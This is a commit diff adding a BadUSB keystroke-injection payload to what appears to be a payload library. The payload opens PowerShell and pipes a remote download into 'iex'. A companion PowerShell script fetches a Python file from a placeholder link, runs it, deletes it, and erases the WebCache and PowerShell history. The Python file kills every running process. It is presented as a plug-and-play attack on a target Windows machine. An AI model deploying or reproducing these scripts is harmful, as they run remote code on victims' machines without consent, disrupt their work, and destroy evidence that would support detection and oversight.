Merge pull request #213 from aleff-github/patch-7

Close All Applications In Windows - Plug And Play
2023-03-03 11:36:03 -05:00 · 2023-03-03 11:36:03 -05:00 · a7ef2b2882
parent 3afa5936bb 2303cb5988
commit a7ef2b2882
4 changed files with 102 additions and 0 deletions
--- a/payloads/library/execution/CloseAllApplicationsInWindows/README.md
+++ b/payloads/library/execution/CloseAllApplicationsInWindows/README.md
@ -0,0 +1,28 @@
+# Close All Applications - BADUSB ✅
+
+A script used to close all target open applications.
+
+🟢 **Plug-And-Play** 🟢
+
+**Category**: Execution
+
+## Description
+
+A script used to close all target open applications.
+
+Opens PowerShell hidden, download a Python script, execute it, remove Python script downloaded, delete powershell history.
+
+## Getting Started
+
+### Dependencies
+
+* Internet Connection
+* Windows 10,11
+
+### Executing program
+
+* Plug in your device
+
+### Settings
+
+- No settings - Plug-And-Play
--- a/payloads/library/execution/CloseAllApplicationsInWindows/close_all_app.ps1
+++ b/payloads/library/execution/CloseAllApplicationsInWindows/close_all_app.ps1
@ -0,0 +1,18 @@
+# Download Python script
+
+# Reply $scriptUrl with YOUR LINK. The Payload should be script.py
+$scriptUrl = "YOUR_END_USER_LINK_WITH_PAYLOAD"
+$savePath = "$env:temp\script.py"
+(New-Object System.Net.WebClient).DownloadFile($scriptUrl, $savePath)
+
+# Execute Python script
+& python $savePath
+
+# Delete the downloaded script
+Remove-Item $savePath
+
+# Clear the download history from the system's web cache
+Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\Windows\WebCache\*" -Recurse -Force
+
+# Clear the PowerShell command history
+Clear-History
--- a/payloads/library/execution/CloseAllApplicationsInWindows/payload.txt
+++ b/payloads/library/execution/CloseAllApplicationsInWindows/payload.txt
@ -0,0 +1,44 @@
+REM #####################################################
+REM #                                                   |
+REM # Title        : Close All Applications             |
+REM # Author       : Aleff                              |
+REM # Version      : 1.0                                |
+REM # Category     : Execution                          |
+REM # Target       : Windows 10-11                      |
+REM #                                                   |
+REM #####################################################
+
+REM Plug-And-Play
+
+REM 
+REM 1. Open a powershell
+REM 2. Download a Python script
+REM 3. Execute it
+REM 4. Remove Python script downloaded
+REM 5. Delete powershell history
+REM
+
+REM Reply with YOUR LINK. The Payload should be close_all_app.ps1
+DEFINE POWERSHEL_CODE example.com
+
+DELAY 2000
+GUI x
+DELAY 250
+DOWNARROW
+DOWNARROW
+DOWNARROW
+DOWNARROW
+DOWNARROW
+DOWNARROW
+DOWNARROW
+DOWNARROW
+DOWNARROW
+DOWNARROW
+ENTER
+DELAY 1000
+TAB
+TAB
+ENTER
+DELAY 2000
+STRING irm POWERSHEL_CODE | iex
+ENTER
--- a/payloads/library/execution/CloseAllApplicationsInWindows/script.py
+++ b/payloads/library/execution/CloseAllApplicationsInWindows/script.py
@ -0,0 +1,12 @@
+try:
+    import psutil
+except:
+    import os
+    os.system("pip install psutil")
+    import psutil
+
+for process in psutil.process_iter():
+    try:
+        process.terminate()
+    except:
+        pass